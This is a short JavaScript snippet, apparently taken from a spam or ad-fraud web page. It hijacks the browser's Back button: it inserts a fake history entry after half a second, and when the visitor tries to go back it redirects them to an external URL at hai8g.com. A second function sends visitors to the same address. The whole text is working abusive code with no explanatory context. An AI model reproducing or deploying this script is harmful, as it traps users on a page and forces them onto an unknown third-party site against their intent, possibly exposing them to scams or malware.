window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {
        fh();}
    setTimeout('hh();', 500);
    function fh(){
        location.href="https://hai8g.com/4/11220808";
    }
    function goon(){
        location.href="https://hai8g.com/4/11220808";
    }
